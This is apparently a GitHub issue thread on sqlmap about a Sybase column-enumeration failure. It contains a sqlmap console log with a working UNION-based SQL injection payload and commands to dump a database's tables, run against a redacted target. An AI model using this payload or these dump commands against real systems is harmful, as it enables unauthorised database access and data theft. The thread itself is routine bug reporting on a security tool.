### ISSUE TITLE
Sybase Database Dumping Unable to Enum Columns

### ISSUE THREAD

**Issue by marginaldeer** [sqlmapproject/sqlmap#2792]
## What's the problem (or question)?
Sybase support does not appear to be working while enumerating columns.  The --column flag works, but the -C flag does not.  When dumping a tables contents nothing is done and the error: "[10:03:14] [WARNING] unable to enumerate the columns for table 'foo' in database 'bar'" is provided.  The injection I ran into this issue with was a 'Generic UNION query (NULL) - 11 columns'.   

## How can we reproduce the issue?
Attempt to dump the contents of a Sybase database using something similar to:
python sqlmap.py -r request.txt -D foo -T bar --columns --dump

The columns will be enumerated using the --columns switch but the dump will fail saying it cannot enumerate the columns.

**Comment by stamparm** [comment]
Can you please give the console output you get with `python sqlmap.py -r request.txt -D foo -T bar --columns --dump`?

**Comment by marginaldeer** [comment]
root@ninja:~/sqlmap# python sqlmap.py -r ../sqli-request.txt -D foo -T bar --columns --dump --fresh-queries
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.11.24#dev}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:44:35

[08:44:35] [INFO] parsing HTTP request from '../sqli-request.txt'
[08:44:36] [INFO] resuming back-end DBMS 'sybase' 
[08:44:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Number (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: Value=test&ID=1&Number=44444') UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(119)+CHAR(88)+CHAR(113)+CHAR(100)+CHAR(81)+CHAR(85)+CHAR(110)+CHAR(103)+CHAR(67)+CHAR(100)+CHAR(98)+CHAR(104)+CHAR(80)+CHAR(68)+CHAR(83)+CHAR(112)+CHAR(101)+CHAR(77)+CHAR(79)+CHAR(87)+CHAR(108)+CHAR(116)+CHAR(90)+CHAR(99)+CHAR(66)+CHAR(115)+CHAR(80)+CHAR(79)+CHAR(80)+CHAR(78)+CHAR(120)+CHAR(73)+CHAR(75)+CHAR(80)+CHAR(105)+CHAR(114)+CHAR(101)+CHAR(88)+CHAR(67)+CHAR(73)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jvFN&Field=LastName&_=1
---
[08:44:42] [INFO] the back-end DBMS is Sybase
web server operating system: Windows REDACTED
web application technology: REDACTED
back-end DBMS: Sybase
[08:44:42] [INFO] fetching columns for table 'bar' on database 'foo'
[08:44:42] [INFO] fetching number of distinct values for column 'qOch.name'
[08:44:42] [INFO] using column 'qOch.name' as a pivot for retrieving row data
Database: foo
Table: bar
[45 columns]
+------------------------------+----------+
| Column                       | Type     |
+------------------------------+----------+
| REDACTED			           | int      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | char     |
| REDACTED                     | char     |
| REDACTED                     | varchar  |
| REDACTED                     | int      |
| REDACTED                     | datetime |
| REDACTED                     | int      |
| REDACTED                     | char     |
| REDACTED                     | decimal  |
| REDACTED                     | decimal  |
| REDACTED                     | datetime |
| REDACTED                     | datetime |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | datetime |
| REDACTED                     | int      |
| REDACTED                     | money    |
| REDACTED                     | bit      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | char     |
| REDACTED                     | int      |
| REDACTED                     | datetime |
| REDACTED	                   | int      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | char     |
| REDACTED                     | char     |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | bit      |
| REDACTED                     | int      |
| REDACTED                     | varchar  |
| REDACTED                     | int      |
| REDACTED                     | int      |
| REDACTED                     | tinyint  |
| REDACTED                     | char     |
+------------------------------+----------+

[08:44:50] [INFO] fetching columns for table 'bar' on database 'foo'
[08:44:50] [INFO] fetching number of distinct values for column 'uxzq.name'
[08:44:50] [INFO] using column 'uxzq.name' as a pivot for retrieving row data
[08:44:58] [WARNING] unable to enumerate the columns for table 'bar' in database 'foo'
[08:44:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/redacted.com'

[*] shutting down at 08:44:58

**Comment by stamparm** [comment]
Can you share request file privately to `miroslav@sqlmap.org`? I am not able to realize what is going on here.

**Comment by stamparm** [comment]
ping?

**Comment by marginaldeer** [comment]
I will be unable to provide the output you requested due to its sensitivity.  I was able to work around the issue by using a custom SQL query (--sql-query).

Thanks for your time and I apologize for any inconvenience.
